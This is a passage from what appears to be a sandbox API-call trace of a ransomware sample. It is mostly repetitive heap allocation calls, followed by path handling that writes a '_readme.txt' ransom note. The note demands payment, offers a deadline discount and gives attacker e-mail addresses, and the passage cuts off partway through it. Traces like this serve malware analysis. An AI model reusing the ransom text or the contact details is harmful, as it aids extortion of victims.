hHeap=0x630000) returned 1 [0094.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.015] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.015] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.016] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.016] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.017] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.017] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.018] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.018] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.019] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.019] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.020] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.020] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.021] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.021] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.022] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.022] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.023] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.023] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.024] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.024] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.025] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.025] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.026] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.026] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.027] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.027] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.028] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.028] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.029] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.029] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.030] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0094.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.030] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.030] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.030] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.030] PathFindFileNameW (pszPath="") returned="" [0094.030] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.030] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.032] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.032] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0094.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.032] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.032] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.032] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0094.033] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0094.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.033] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.033] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0094.033] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.034] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for 